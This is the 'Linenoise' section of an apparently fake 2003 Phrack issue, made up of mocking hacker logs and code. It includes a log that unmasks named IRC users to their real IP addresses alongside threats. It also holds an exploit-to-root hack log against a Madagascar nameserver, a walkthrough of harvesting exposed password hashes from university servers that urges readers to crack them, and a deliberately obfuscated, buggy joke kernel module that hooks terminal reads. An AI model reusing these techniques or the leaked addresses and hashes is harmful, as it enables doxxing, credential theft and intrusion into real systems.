                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3f, Phile #0x03 of 0x0f

|=-------------------------=[ L I N E N O I Z E ]=------------------------=|
|=------------------------------------------------------------------------=|
|=----------------------------=[ phrackstaff ]=---------------------------=|

Everything that does not fit somewhere else can be found here.
Corrections and additions to previous articles, too short articles or
articles that just don't make it, funny hacklogs....everything.

|=[ 0x01 ]=---------------------------------------------------------------=|

Finding the Whitehat - an0nym0us

This brief user submission shows the lengths that some people will go to
find the real IPs of known whitehats so that they can then be owned and
rm'd. Enter the whitehat anti-witness protection program. Here's what
happens to snitches on the net:

root@mallory:/ezbake# ./burn `cat plaintext/netric-org.new2`
/* cool awesome hacker header censored by pstaff */
Round 1 - Hamming distance: 22 - k0: 0x97c80e49 k1: 0x81c4058b k2: 0x79f481f2
Round 2 - Hamming distance: 18 - k0: 0xf0e28106 k1: 0x4861ad99 k2: 0x5f405d15
Round 3 - Hamming distance: 15 - k0: 0x0984e0b9 k1: 0xd1983d94 k2: 0x68042d31
Round 4 - Hamming distance: 14 - k0: 0x0984e0b5 k1: 0xd1983d90 k2: 0x68042d2d
Round 5 - Hamming distance: 12 - k0: 0x4904e0b5 k1: 0xd1183d90 k2: 0x68042d2d
Round 6 - Hamming distance: 11 - k0: 0x2984e0bd k1: 0xb1983d70 k2: 0x68042d15
Round 7 - Hamming distance: 9 - k0: 0x4884e0b0 k1: 0xd0983d9b k2: 0x68042ca9
Round 8 - Hamming distance: 8 - k0: 0x0804e0c0 k1: 0x90183d5b k2: 0x68042d39
Round 9 - Hamming distance: 7 - k0: 0x0804e0d0 k1: 0x90183d4b k2: 0x68042d39
Round 10 - Hamming distance: 7 - k0: 0x0804e0d0 k1: 0x90183d4b k2: 0x68042d39
Round 11 - Hamming distance: 6 - k0: 0x0804e0ce k1: 0x90183d45 k2: 0x68042d39
Round 12 - Hamming distance: 5 - k0: 0x4804f0cc k1: 0xd0183c87 k2: 0x68043d79
Round 13 - Hamming distance: 4 - k0: 0x0804f0ce k1: 0x90183d85 k2: 0x68043c79
Round 14 - Hamming distance: 4 - k0: 0x0804f0ce k1: 0x90183d85 k2: 0x68043c79
Round 15 - Hamming distance: 4 - k0: 0x0804f0ce k1: 0x90183d85 k2: 0x68043c79
Round 16 - Hamming distance: 3 - k0: 0x4808f0ce k1: 0xd0103d85 k2: 0x68083c79
Round 17 - Hamming distance: 2 - k0: 0x0800f0ce k1: 0x90003d85 k2: 0x68003c79
Round 18 - Hamming distance: 2 - k0: 0x0800f0ce k1: 0x90003d85 k2: 0x68003c79
Round 19 - Hamming distance: 1 - k0: 0x4800f0ce k1: 0xd0007d85 k2: 0x68007c79
Round 20 - Hamming distance: 1 - k0: 0x4800f0ce k1: 0xd0007d85 k2: 0x68007c79
Round 21 - Hamming distance: 1 - k0: 0x4800f0ce k1: 0xd0007d85 k2: 0x68007c79
MATCH: 0x0000d0ce 0x00007d85 0x00005c79

>> w0a, str0ng keys, especially the most significant word

┌─────---─--──-──────---─--──-─────────--- -- -
| eSDee (~eSDee@2EC0E90E.914AD78D.7FC28CE1.IP) (unknown)
│ ircname : eSDee
| channels : @#netric
│ server : irc.netric.org (Netric IRC Server)
| operator : eSDee (is NOT an IRC warrior)
| help : eSDee - is available for help.
| eSDee was (~eSDee@2EC0E90E.914AD78D.7FC28CE1.IP)

root@mallory:/ezbake# ./burn -d 2EC0E90E.914AD78D.7FC28CE1.IP -k 0x0000d0ce 0x00007d85 0x00005c79
[+] 213.201.176.198

┌─────---─--──-──────---─--──-─────────--- -- -
| Laurens (~laurens@DD81E3B.D2642F0E.15F667A0.IP) (unknown)
│ ircname : laurens
| channels : @#netric
│ server : irc.netric.org (Netric IRC Server)
| operator : Laurens (is NOT an IRC warrior)
| help : Laurens - is available for help.

root@mallory:/ezbake# ./burn -d DD81E3B.D2642F0E.15F667A0.IP -k 0x0000d0ce 0x00007d85 0x00005c79
[+] 81.17.46.157

┌─────---─--──-──────---─--──-─────────--- -- -
| Tex (~Tex@398AD8F4.5D1F7852.16B25093.IP) (unknown)
│ ircname : Tex - Representative of Shadows
| channels : @#netric
│ server : irc.netric.org (Netric IRC Server)
: idle : 1 hours 24 mins 57 secs (signon: Tue Sep 23 17:16:13 2003)

root@mallory:/ezbake# ./burn -d 398AD8F4.5D1F7852.16B25093.IP -k 0x0000d0ce 0x00007d85 0x00005c79
[+] 213.214.43.116

┌─────---─--──-──────---─--──-─────────--- -- -
| Argv[] (~argv@2ECA21BE.36EC7F5.1BE1D223.IP) (unknown)
│ ircname : "Survival of the fittest." -- Darwin._
| channels : @#netric
│ server : irc.netric.org (Netric IRC Server)
: idle : 23 hours 15 mins 25 secs (signon: Mon Sep 22 20:09:56 2003)

root@mallory:/ezbake# ./burn -d 2ECA21BE.36EC7F5.1BE1D223.IP -k 0x0000d0ce 0x00007d85 0x00005c79
[+] 193.77.159.230

┌─────---─--──-──────---─--──-─────────--- -- -
| [Elwin]-gone (~Elwin@2E9E2501.725E068F.50F7261E.IP) (unknown)
│ ircname : http://Elwin.ChatValley.nl
| channels : @#netric
│ server : irc.netric.org (Netric IRC Server)
: idle : 23 hours 17 mins 53 secs (signon: Mon Sep 22 20:09:52 2003)

root@mallory:/ezbake# ./burn -d 2E9E2501.725E068F.50F7261E.IP -k 0x0000d0ce 0x00007d85 0x00005c79
[+] 81.171.2.188

┌─────---─--──-──────---─--──-─────────--- -- -
| newroot (~seprioth@29A5FFF4.46779EFE.7026342B.IP) (unknown)
│ ircname : seprioth
| channels : @#netric
│ server : irc.netric.org (Netric IRC Server)
: idle : 1 hours 1 mins 21 secs (signon: Tue Sep 23 18:26:43 2003)

root@mallory:/ezbake# ./burn -d 29A5FFF4.46779EFE.7026342B.IP -k 0x0000d0ce 0x00007d85 0x00005c79
[+] 212.6.91.195

┌─────---─--──-──────---─--──-─────────--- -- -
| h4x0r (~kiss@39C0CF3C.EC41C18A.37392DA9.IP) (unknown)
│ ircname : Level Seven Digital
| channels : @#netric
│ server : irc.netric.org (Netric IRC Server)
: idle : 23 hours 18 mins 43 secs (signon: Mon Sep 22 20:09:39 2003)

[+] 219.101.83.40

┌─────---─--──-──────---─--──-─────────--- -- -
| feeble (~null@25E7EE98.668A5C0B.75AA0ACB.IP) (unknown)
│ ircname : null
| channels : @#netric
│ server : irc.netric.org (Netric IRC Server)
: idle : 17 hours 0 mins 42 secs (signon: Mon Sep 22 20:09:59 2003)

root@mallory:/ezbake# ./burn -d 25E7EE98.668A5C0B.75AA0ACB.IP -k 0x0000d0ce 0x00007d85 0x00005c79
[+] 209.26.65.169

|=[ 0x02 ]=---------------------------------------------------------------=|

Ownage log of Network Information Center Madagascar - az14n xtr4v4g4nz4

* EDITOR'S NOTE * : This shit is pretty fuckin gay, and I'm not sure why
we included it, apart from filling the void left by a lack of user
submissions, but it should give you an insight into how people like s1/
dvdman hack.
* * * * * * * * *

openssl remote apache juarez!@#
[+] SSL k0nn3kti0nz
cipher: 0x405a454c ciphers: 0x81227b8
check your addr and hit enter
using 100 threads
using retaddr 0xbffffd00
using retaddr 0xbffffc00
using retaddr 0xbffffb00
using retaddr 0xbffffa00
using retaddr 0xbffff900
using retaddr 0xbffff800
read: Connection reset by peer
using retaddr 0xbffff700
using retaddr 0xbffff600
connected
using addr 0xbffff54c
bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a; id; w;
Linux ns.nic.mg 2.4.18-6mdk #1 Fri Mar 15 02:59:08 CET 2002 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
bash: /usr/bin/w: Permission denied
bash-2.05$
bash-2.05$

*** Few sekz l8r after d0wnl04d1ng s0m3 shietzniT ***

bash-2.05$ ./aa
sh-2.05# id
uid=0(root) gid=0(root) groupes=0(root),10(wheel),6(disk),4(adm),3(sys),2(daemon),1(bin)

*** Few sekz after ex3cut1ng s0m3 "too1z" ***

The authenticity of host 'ns.nic.mg (62.173.234.149)' can't be established.
RSA1 key fingerprint is dc:cd:da:72:fe:6e:db:70:ff:11:e5:cc:b4:27:80:80.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'ns.nic.mg,62.173.234.149' (RSA1) to the list of known hosts.
root@ns.nic.mg's password:
Last login: Tue Dec 9 11:30:41 2003 from 194.214.107.63
No mail.
WARNING: Your password expires in 11 days
[root@ns root]# uptime; id; uname -a
6:32am up 40 days, 18:46, 0 users, load average: 0.00, 0.00, 0.00
Linux ns.nic.mg 2.4.18-6mdk #1 Fri Mar 15 02:59:08 CET 2002 i686 unknown
uid=0(root) gid=0(root) groupes=0(root),10(wheel),6(disk),4(adm),3(sys),2(daemon),1(bin)
[root@ns root]# ls -a /var/named
./ 194.214.107.rev com.mg isoc.mg mg20031112 mil.mg net.mg org.mg save/
../ asso.mg edu.mg mg mg.20031118 named.ca nic.mg prd.mg
127.0.0.rev co.mg gov.mg mg_20031028 mg.20031127 named.local nic.mg.db root.hints
[root@ns root]# cat /etc/shadow
[root@ns root]#
[root@ns root]#
[root@ns root]# exit
Connection to ns.nic.mg closed.

|=[ 0x03 ]=---------------------------------------------------------------=|

IRC.NAC.NET Operator Gets Owned - anonymous aggressive irc dude

* EDITORIAL INTERJECTION: While this log wasn't exactly what we would call
a pinnacle of achievement in terms of hacklogs, we edited some of it out
and left the slightly amusing/interesting parts *

#do this to restart spammer "not only is he an oper but a spammer"
cat q-read | grep local | sort | uniq -c | sort -nr > mail-to
cat q-read | grep "<" | tr -s ' ' | cut -f8 -d' ' | sort | uniq -c | sort -rn > mail-from

...

Volume in drive C is MAIN
Volume Serial Number is 94A4-D96A

Directory of C:\

07/21/2003 08:27 PM 382,006 2003-07-21-weather.bmp
06/26/2003 05:19 PM 44 800 fiasco.txt
05/21/2003 01:41 AM 9,569 agreement between joel tew and NAC may 20 2003.wpd
06/15/2003 10:37 PM 18,534 AlmostGone.jpg
08/22/2002 02:48 PM 0 AUTOEXEC.BAT
06/02/2003 01:38 AM
<html> <head> </ ...
... <html> <head> </head><body><pre>root:SSpbaftOt8rE6:8573::::: daemon:NP:6445:::::
bin:NP ...
www.mit.edu/afs/athena/system/config/passwd/sun4x_56/shadow - 1k - Cached -
Similar pages
---
Wow, looks like we hit paydirt right here. Hey wait.. I bet it's a dead
link or something, lets make sure it works...
---
http://www.mit.edu/afs/athena/system/config/passwd/sun4x_56/shadow
---
h0h0h0. Lookz like somone forget to configure their afs server properly!
Letz explore a little deeper.
---
http://www.mit.edu/afs/athena/system/config/passwd/

Parent Directory 08-Jul-2001 01:18 -
rhlinux/ 07-Feb-2000 22:38 -
sgi_53/ 26-May-1998 20:40 -
sgi_62/ 26-May-1998 20:40 -
sgi_63/ 26-May-1998 20:40 -
sgi_65/ 22-Apr-1999 01:06 -
sun4m_54/ 26-May-1998 20:40 -
sun4x_55/ 26-May-1998 20:40 -
sun4x_56/ 26-May-1998 20:40 -
sun4x_57/ 26-May-1998 20:40 -
sun4x_58/ 26-May-1998 20:40 -
sun4x_59/ 26-May-1998 20:40 -
---
OMG w00t. Lookz like we now have lotza passwords!@ Letz make sure we can
acesss them all.
---
http://www.mit.edu/afs/athena/system/config/passwd/sgi_53/passwd
---
Yep! It looks like we can! Letz see what else is on there!
---
http://www.mit.edu/afs/net.mit.edu/system/vax_bsd43/srvd.72/etc/passwd

root:2pEdLRdD8rMnk:0:1:System PRIVILEGED Account:/:/bin/csh
operator:PASSWORD HERE:0:28:Operator PRIVILEGED Account:/opr:/opr/opser
ris:Nologin:11:11:Remote Installation Services Account:/usr/adm/ris:/bin/sh
daemon:*:1:1:Mr Background:/:
sys:PASSWORD HERE:2:3:Mr Kernel:/usr/sys:
bin:PASSWORD HERE:3:4:Mr Binary:/bin:
---
Jesus, a VAX! It lookz like we've discovered a true digital Jurrasic Parq
here guyz!@ Ok now we'll try to google for "root:*:0:0:Charlie", this will
find mainly bsd systems.
---
http://www.ensta.fr/~perret/Cours/Securite/Ensta/passwd

Jesus, I'm not even going to paste this because it's juzt not all gonna
fit!@
--
That french one has mad passwords for your hacking adventures but the MIT
ones are all root pw'z only. I'd bet pretty highly tho that the main NIS
server (or LDAP or whatever they use) is as fucked up as those so you can
prolly http:// your way to however many hundred thousand passwords. Even
if you can't be bothered doing that then I'm sure there's plenty of kidz
out there who have these 3Ghz boxes for playing quake or smt. Use your
magination. If you get realjiggy with search stringz then it's possible to
turn out shadow files for all kinda of .gov's (nist, lbl etc) and stuff so
yea, play around.

|=[ 0x05 ]=---------------------------------------------------------------=|

p62 Poll -
http://www.securitybriefing.com/modules.php?name=Surveys&pollID=2

Survey

What is your opinion of "Phrack 62"?

( ) Loads of FUD from worthless Black Hats.
( ) Good articles but silly/immature commentary.
(*) The best thing I ever read.

|=[ 0x06 ]=---------------------------------------------------------------=|

p62 Release Announcements Heralded Worldwide -

http://www.informit.com/isapi/weblog_id~%7BCEF1DC33-01E0-45D5-8FCA-348DC993AA75%7D/st~%7B4D022936-8769-4F76-9152-F65D036DEDF9%7D/weblog/showComments.asp

"Fake" Phrack 62 is out
by Seth Fogie - SEP 22, 2003 11:22:24 PM
0 Replies

Whitehat, Blackhat, greyhat, or even anti-hat, this edition of Phrack has
it all. If you have never heard of Phrack, it is an online publication
that has long held the interests of hackers from all types of backgrounds.
Phone systems, electronics, traffic lights, and of course the typical
computer have all been targeted by Phrack authors. However, in the last
week Phrack 62, also being referred to as a fake Phrack, made its debut.
While this version definitely had some interesting technical chapters, it
provided several not too subtle discussions against the whitehat hackers
of the world. Regardless, if you are looking for something that is
humorous, technically interesting, and maybe even a little offensive, this
version of Phrack is for you! Just don't believe everything you read

----------------------------------------------------------------------

Found cached on www.professionalsecuritytester.net/

Phracks has been released
Posted by cdupuis on Sunday, September 21 @ 09:01:06 EDT (2 reads)

PHRACK #62 Has Been Released

Phrack Magazine is one of the longest running electronic magazines in
existence, and certainly one of the most interesting. Since 1985, Phrack
has been providing the hacker community with information on operating
systems, networking technologies and telephony, as well as relaying
features of interest to the international computer underground.

The Phrack Magazine team released a new issue of this Magazine, number 62.

1) Introduction - Phrack Staff
2) Loopback - Phrack Staff
3) Linenoise - Phrack Staff
4) Toolz Armory - elguapo
5) Phrack Prophile on shok - Phrack Staff
6) Eye on the Spy - tr4shc4n m4n
7) Local Honeypot Identification - Joseph Corey
8) Look, a Phone Article!! - d0nn1e n4rk0
9) Writing Plan9 Shellcode - m1lt0n
10) Crucial LKMS for All Hackers - warez mullah
11) New Hacking Manifesto - cr4zy c0nsuel0
12) THE PROJEKT MAYHEM TOOLKIT - d0kt0r m4ngl3r
13) Sneeze: Wreaking Havoc Upon Snort - m1lt0n
15) Phrack World News - Phrack Staff

Additional Information:
The information has been provided by Phrack Staff.

|=[ 0x07 ]=---------------------------------------------------------------=|

THE LEET SPEAK LKM - KaRELeSS KaRL & warez mullah

y0y0y0, f0r 4ll 0f eWe h4cK3rz 0ut there in h4krsp4ce h3r3 iZ a mod 2 make
the operating system formerly backdoored by suCKit m0re us4ble for 4ll of
eWe el8 h4qrz. r u s1q of using stran9er/swr's tcl kodez to speak like a
ku0ldu0d on irc?
then this lkm is the anzw3r 2 y0ur pray3rz......

Begin Extraction of el8 k0d3z h3r3
---------------------------------------

#define MODULE
#define __KERNEL__

/*
By using this code you subject yourself to submitting to our will. You
forfeit any and all rights once you have compiled this code. Whitehats
please take note that we reserve the right to rm your fat ass if we learn
of its usage. Snosoft and iDefense you still have reserve the right to be
owned like jobe. Any modifications to this el8 code will result in a
prompt rm'ing and death by webcam so we can watch for our own amusement
because we fat goths are simply too big to leave our beds. eEye is the
root of all microsoft's problems. They are the virii writers that crash
your XP machine just as Jenna Jameson catches that load in her eye.
Atstake employees take note, we are watching you. Your continued acts of
script kiddy'ism will not be tolerated by us or your managers. Further
acts will result in PHC release of logs for Atstake Management review. Now
get back to cracking those NT Lan Man passwords and SQL injection codes.
Oh, and have a Merry Fucking Christmas!
*/

/* To Compile:
   cc -c -o whatthefuckever.o -I/lib/modules/`uname -r`/include thisfile.c
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define ONE 1
#define NOTONE 0
#define NOTNOTONE 1
#define THEOISGAY 1
#define BEGIN_KMEM { mm_segment_t o = getfs(); setfs(get_ds());
#define END_KMEM setfs(o); }
#define LANCE_SPITZNERS_HOME_IP " "
#define BAD_INT int
#define GOOD_INT unsigned int
#define CHAR char
#define SECURE_CHAR unsigned char
#define STRUCT struct
#define HOWBIGISIT size_t
#define system memset
#define sys_unlink kmalloc
#define printf kfree
#define fprintf copy_from_user
#define syslog copy_to_user

#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,4,9)
#ifdef MODULE_LICENSE
MODULE_LICENSE("GPL");
MODULE_AUTHOR("Phrack Labs");
#endif
#endif

char *targetproclist[] = { "epic", "BitchX", NULL };

ssize_t er33t_tty_read(struct file * file, CHAR * buf, HOWBIGISIT count,
                       loff_t *ppos);
ssize_t (*o_read) (struct file * file, CHAR * buf, HOWBIGISIT count,
                   loff_t *ppos);
void play_with_ttys( void );
void stop_molesting_ttys( void );

BAD_INT init_module(void)
{
    play_with_ttys();
    return NOTONE;
}

void cleanup_module(void)
{
    stop_molesting_ttys();
    return;
}

BAD_INT last_was_leet = 1;

void play_with_ttys( void )
{
    (void *) o_read = (void *) current->files->fd[0]->f_op->read;
    current->files->fd[0]->f_op->read = (void *) er33t_tty_read;
};

void stop_molesting_ttys( void )
{
    (void *) current->files->fd[0]->f_op->read = (void *) o_read;
}

ssize_t er33t_tty_read(struct file * file, CHAR * buf, HOWBIGISIT count,
                       loff_t *ppos)
{
    BAD_INT l;
    GOOD_INT pos;
    CHAR *er33tbuf;
    int i;

    system(buf,0,count);
    l = (*o_read)(file,buf,count,ppos);
    if (l < 0)
        return THEOISGAY;

    /* added @ the last minute */
    i=0;
    while(targetproclist[i]!=NULL) {
        if (strstr (current->comm, targetproclist[i]))
            goto THEO_IS_A_GLORYHOLE_GIRL;
    }
    return l;

THEO_IS_A_GLORYHOLE_GIRL:
    er33tbuf = sys_unlink(sizeof(CHAR) * (l+1),GFP_KERNEL);
    system(er33tbuf,0,l+1);
    if(fprintf(er33tbuf,buf,l)) {
        printf(er33tbuf);
        return NOTONE;
    }

    for (pos = 0; pos < l; pos++) {
        CHAR change;

        change = 0x00;
        switch(((*(er33tbuf+pos)))) {
        case 'l': change = '1'; break;
        case 'L': change = '|'; break;
        case 't': change = '7'; break;
        case 'T': change = '7'; break;
        case 'o': change = 'O'; break;
        case 'O': change = '0'; break;
        case 'a': change = '@'; break;
        case 'A': change = '4'; break;
        case 's': change = 'z'; break;
        case 'S': change = '5'; break;
        default: change = 0x00; break;
        }
        if (last_was_leet) {
            if (change != 0x00)
                *(er33tbuf+pos) = change,last_was_leet = 1;
        } else
            last_was_leet = 0;

        syslog(buf,er33tbuf, l);
        printf(er33tbuf);
        return l;
    }
}

End extraction of el8 k0d3z 2k00l4u
---------------------------------------

|=[ EOF ]=---------------------------------------------------------------=|